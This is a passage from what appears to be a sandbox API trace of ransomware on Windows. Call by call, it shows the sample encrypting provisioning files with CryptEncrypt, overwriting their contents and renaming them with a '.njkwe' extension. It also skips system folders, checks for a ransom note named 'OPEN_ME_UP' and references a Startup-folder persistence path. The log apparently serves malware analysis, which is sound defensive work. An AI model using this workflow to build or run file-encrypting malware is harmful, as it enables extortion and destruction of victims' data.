lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x29e, lpOverlapped=0x0) returned 1 [0076.411] GetProcessHeap () returned 0xbe0000 [0076.411] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.411] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.411] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.411] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.411] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.411] CloseHandle (hObject=0x43c) returned 1 [0076.412] GetProcessHeap () returned 0xbe0000 [0076.412] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.412] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0076.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\103__connections_cellular_claro (dominican republic)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\103__connections_cellular_claro (dominican republic)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.412] GetProcessHeap () returned 0xbe0000 [0076.412] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.412] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9045e0ef, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9045e0ef, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9045e0ef, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x283, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml", cAlternateFileName="104__C~1.PRO")) returned 1 [0076.412] lstrcmpiW (lpString1="104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.412] lstrcmpiW (lpString1="104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.412] lstrcmpiW (lpString1="104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.412] lstrcmpiW (lpString1="104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.412] lstrcmpiW (lpString1="104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.412] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml") returned 163 [0076.412] StrStrIW (lpFirst="104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.413] lstrcmpW (lpString1="104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.413] lstrcmpW (lpString1="104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.413] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\104__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.413] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\104__connections_cellular_porta gsm (ecuador)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.413] GetTickCount () returned 0x115371a [0076.413] GetTickCount () returned 0x115371a [0076.413] GetTickCount () returned 0x115371a [0076.413] GetTickCount () returned 0x115371a [0076.413] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.413] GetProcessHeap () returned 0xbe0000 [0076.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.413] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0076.418] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.418] WriteFile (in: hFile=0x43c, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0076.418] GetProcessHeap () returned 0xbe0000 [0076.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.418] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.418] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.418] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.418] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.418] CloseHandle (hObject=0x43c) returned 1 [0076.419] GetProcessHeap () returned 0xbe0000 [0076.419] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.419] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0076.419] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\104__connections_cellular_porta gsm (ecuador)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\104__Connections_Cellular_PORTA GSM (Ecuador)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\104__connections_cellular_porta gsm (ecuador)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.419] GetProcessHeap () returned 0xbe0000 [0076.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.419] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9045e0ef, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9045e0ef, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9045e0ef, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml", cAlternateFileName="105__C~1.PRO")) returned 1 [0076.419] lstrcmpiW (lpString1="105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.420] lstrcmpiW (lpString1="105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.420] lstrcmpiW (lpString1="105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.420] lstrcmpiW (lpString1="105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.420] lstrcmpiW (lpString1="105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.420] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml") returned 164 [0076.420] StrStrIW (lpFirst="105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.420] lstrcmpW (lpString1="105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.420] lstrcmpW (lpString1="105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.420] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\105__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.420] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\105__connections_cellular_telefonica (ecuador)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.421] GetTickCount () returned 0x1153729 [0076.421] GetTickCount () returned 0x1153729 [0076.421] GetTickCount () returned 0x1153729 [0076.421] GetTickCount () returned 0x1153729 [0076.421] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.421] GetProcessHeap () returned 0xbe0000 [0076.421] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.421] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x2d9, lpOverlapped=0x0) returned 1 [0076.427] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.427] WriteFile (in: hFile=0x43c, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x2d9, lpOverlapped=0x0) returned 1 [0076.427] GetProcessHeap () returned 0xbe0000 [0076.427] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.427] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.427] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.427] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.427] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.427] CloseHandle (hObject=0x43c) returned 1 [0076.427] GetProcessHeap () returned 0xbe0000 [0076.427] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.427] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0076.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\105__connections_cellular_telefonica (ecuador)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\105__Connections_Cellular_Telefonica (Ecuador)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\105__connections_cellular_telefonica (ecuador)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.428] GetProcessHeap () returned 0xbe0000 [0076.428] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.428] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9045e0ef, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9045e0ef, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9045e0ef, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml", cAlternateFileName="106__C~1.PRO")) returned 1 [0076.428] lstrcmpiW (lpString1="106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.428] lstrcmpiW (lpString1="106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.428] lstrcmpiW (lpString1="106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.428] lstrcmpiW (lpString1="106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.428] lstrcmpiW (lpString1="106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.428] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml") returned 159 [0076.428] StrStrIW (lpFirst="106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.428] lstrcmpW (lpString1="106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.428] lstrcmpW (lpString1="106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.428] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\106__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.428] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\106__connections_cellular_mobinil (egypt)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.429] GetTickCount () returned 0x1153729 [0076.429] GetTickCount () returned 0x1153729 [0076.429] GetTickCount () returned 0x1153729 [0076.429] GetTickCount () returned 0x1153729 [0076.429] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.429] GetProcessHeap () returned 0xbe0000 [0076.429] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.429] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0076.431] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.431] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0076.431] GetProcessHeap () returned 0xbe0000 [0076.431] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.431] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.431] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.431] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.431] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.431] CloseHandle (hObject=0x43c) returned 1 [0076.432] GetProcessHeap () returned 0xbe0000 [0076.432] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.432] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0076.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\106__connections_cellular_mobinil (egypt)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\106__Connections_Cellular_Mobinil (Egypt)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\106__connections_cellular_mobinil (egypt)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.432] GetProcessHeap () returned 0xbe0000 [0076.432] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.432] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9048435b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9048435b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9048435b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x360, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml", cAlternateFileName="107__C~1.PRO")) returned 1 [0076.432] lstrcmpiW (lpString1="107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.432] lstrcmpiW (lpString1="107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.432] lstrcmpiW (lpString1="107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.432] lstrcmpiW (lpString1="107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.432] lstrcmpiW (lpString1="107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.432] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml") returned 166 [0076.433] StrStrIW (lpFirst="107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.433] lstrcmpW (lpString1="107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.433] lstrcmpW (lpString1="107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.433] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\107__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.433] CreateFileW 